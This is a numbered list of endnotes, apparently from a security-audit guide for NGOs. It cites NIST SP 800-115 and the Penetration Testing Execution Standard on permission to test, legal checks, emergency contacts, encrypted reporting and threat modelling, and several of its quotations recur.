

  1. Event Planning Inputs - Level-Up

  2. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  3. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  4. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  5. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  6. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  7. See the auditor trainee resource list

  8. APPENDIX A - Auditor travel kit checklist

  9. ^NIST_SP_800-115-travel_prep

  10. Auditor Tool Resource List - Password Dictionary Creation

  11. APPENDIX A - Auditor travel kit checklist

  12. "Traveling teams should maintain a flyaway kit that includes systems, images, additional tools, cables, projectors, and other equipment that a team may need when performing testing at other locations."

  13. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  14. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  15. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  16. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  17. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  18. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  19. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  20. Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

  21. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  22. "Before starting a penetration test, all targets must be identified. "

  23. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  24. "the assessment plan should provide specific guidance on incident handling in the event that assessors cause or uncover an incident during the course of the assessment. This section of the plan should define the term incident and provide guidelines for determining whether or not an incident has occurred. The plan should identify specific primary and alternate points of contact for the assessors... The assessment plan should provide clear-cut instructions on what actions assessors should take in these situations."

  25. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  26. "One of the most important documents which need to be obtained for a penetration test is the Permission to Test document."

  27. Dealing with third parties - The Penetration Testing Execution Standard

  28. APPENDIX D - Auditor Consent Template.

  29. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  30. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  31. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  32. Emergency Contact and Incidents - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  33. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  34. "Assessors need to remain abreast of new technology and the latest means by which an adversary may attack that technology. They should periodically refresh their knowledge base, reassess their methodology-updating techniques as appropriate, and update their tool kits."

  35. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  36. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  37. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  38. Acquiring API Keys

  39. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  40. See: Vulnerability Analysis

  41. Identifying Software Versions

  42. Examining Firewalls Across OS

  43. Identifying Odd/One-Off Services

  44. APPENDIX C - Password Survey

  45. Password Security

  46. Privilege Separation Across OS

  47. Anti-Virus Updates

  48. Identifying Software Versions

  49. Device Encryption By OS Type

  50. Microsoft Security Bulletin

  51. "In-Depth Reading, Vendor Information, & External Advisories"

  52. "Security-Related Vendor Information"

  53. "CERT/CC Advisories"

  54. "Security Tracker"

  55. "Known Vulnerabilities in Mozilla Products"

  56. Microsoft Security Bulletin

  57. "In-Depth Reading, Vendor Information, & External Advisories"

  58. "Security-Related Vendor Information"

  59. "CERT/CC Advisories"

  60. "Security Tracker"

  61. "Known Vulnerabilities in Mozilla Products"

  62. "While vulnerability scanners check only for the possible existence of a vulnerability, the attack phase of a penetration test exploits the vulne rability to confirm its existence."

  63. "Penetration testing also poses a high risk to the organization’s networks and systems because it uses real exploits and attacks against production systems and data. Because of its high cost and potential impact, penetration testing of an organization’s network and systems on an annual basis may be sufficient. Also, penetration testing can be designed to stop when the tester reaches a point when an additional action will cause damage." - NIST SP 800-115, Technical Guide to Information Security Testing and Assessment

  64. Network Access

  65. APPENDIX B - Personal Information to Keep Private

  66. APPENDIX B - Personal Information to Keep Private

  67. "CSOs should gradually build a culture in which all staff, regardless of technical background, feel some responsibility for their own digital hygiene. While staff need not become technical experts, CSOs should attempt to raise the awareness of every staff member, from executive directors to interns - groups are only as strong as their weakest link—so that they can spot issues, reduce vulnerabilities, know where to go for further help, and educate others."

  68. "Pre-Mortum Strategy" - Sources of Power: How People Make Decisions - p.71

  69. "Pre-Mortum Strategy" - Sources of Power: How People Make Decisions - p.71

  70. "Pre-Mortum Strategy" - Sources of Power: How People Make Decisions - p.71

  71. Corruption Perception Index

  72. The ISC Project completes evaluations of information security threats in a broad range of countries. The resulting comprehensive written assessments describe each country’s digital security situation through consideration of four main categories: online surveillance, online attacks, online censorship, and user profile/access.

  73. EISF distributes frequent analysis and summaries of issues relevant to humanitarian security risk management.

  74. The top 500 sites in each country or territory.

  75. Who publishes Transparency Reports?

  76. "Impacts: Chapter 2.7 p. 46 - Operational Security Management in Violent Environments"

  77. "Likelihood: Chapter 2.7 p. 47 - Operational Security Management in Violent Environments"

  78. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  79. "Assessors need to remain abreast of new technology and the latest means by which an adversary may attack that technology. They should periodically refresh their knowledge base, reassess their methodology-updating techniques as appropriate, and update their tool kits."

  80. "Threat Modeling: Designing for Security" by Adam Shostack

  81. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 125.

  82. "Threat Modeling: Designing for Security" by Adam Shostack

  83. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 401.

  84. "When a pilot lands an airliner, their job isn’t over. They still have to navigate the myriad of taxiways and park at the gate safely. The same is true of you and your pen test reports, just because its finished doesn't mean you can switch off entirely. You still have to get the report out to the client, and you have to do so securely. Electronic distribution using public key cryptography is probably the best option, but not always possible. If symmetric encryption is to be used, a strong key should be used and must be transmitted out of band. Under no circumstances should a report be transmitted unencrypted. It all sounds like common sense, but all too often people fall down at the final hurdle." - The Art of Writing Penetration Test Reports

  85. "IDEO Human-Centered Design Toolkit"

  86. "IDEO Human-Centered Design Toolkit"

  87. "IDEO Human-Centered Design Toolkit"

  88. "TechScape Indicators - the engine room"

  89. "TechScape Indicators - the engine room"

  90. "Questionnaires - The Penetration Testing Execution Standard"